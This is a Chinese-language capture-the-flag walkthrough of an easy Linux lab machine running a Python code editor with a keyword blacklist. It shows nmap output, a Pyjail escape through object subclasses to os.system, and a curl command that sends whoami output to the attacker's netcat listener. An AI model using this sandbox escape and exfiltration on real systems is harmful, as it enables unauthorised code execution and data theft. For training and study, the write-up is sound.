Code
信息
Difficulty: Easy
Operating System: Linux
ENTRY POINT
10.10.11.62
资产探测
Nmap scan report for bogon (10.10.11.62)
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-server-header: gunicorn/20.0.4
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 37.522 days (since Mon Feb 17 06:49:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 5000 Python Code Editor
尝试直接访问
看起来就是一个 Python 的在线编辑和运行的环境
尝试执行 import 语句
看起来有关键词黑名单检测,基本检测下来包含有
- import
- system
- popen
- subprocess
- exec
- open
- read
- eval
尝试查看当前的环境中有哪些变量
> print(dir())
['code', 'keyword', 'old_stdout', 'redirected_output']
这些变量没啥有用的信息
参考有关 Pyjail 的相关文章,决定从 str 的内置类入手
> print("".__class__.__base__.__subclasses__())
......
> for index,i in enumerate("".__class__.__base__.__subclasses__()):
> if "o" + "s." in str(i):
> print(index, i)
132 <class 'os._wrap_close'>
> print("".__class__.__base__.__subclasses__()[132])
<class 'os._wrap_close'>
然后从__globals__就可以得到 os 库
> print("".__class__.__base__.__subclasses__()[132].__init__.__globals__)
{'__name__': 'os', '__doc__': "OS routines for NT or Posix depending on what system we're on.\n\nThis exports:\n - all functions from posix or nt, e.g. unlink, stat, etc.\n - os.path is either posixpath......
得到 os 库之后,就可以执行命令了
> print("".__class__.__base__.__subclasses__()[132].__init__.__globals__["syste"+"m"])
<built-in function system>
由于 print(os.system())
不会直接返回命令的执行结果,所以可以尝试通过 curl 和 wget 进行数据传输
# 服务器
> func = "".__class__.__base__.__subclasses__()[132].__init__.__globals__["syste"+"m"]
> print(func("curl 10.10.16.31:9999/`whoami`"))
# Kali
┌──(randark ㉿ kali)-[~]
└─$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.16.31] from (UNKNOWN) [10.10.11.62] 47658
GET /app-production HTTP/1.1
Host: 10.10.16.31:9999
User-Agent: curl/7.68.0
Accept: */*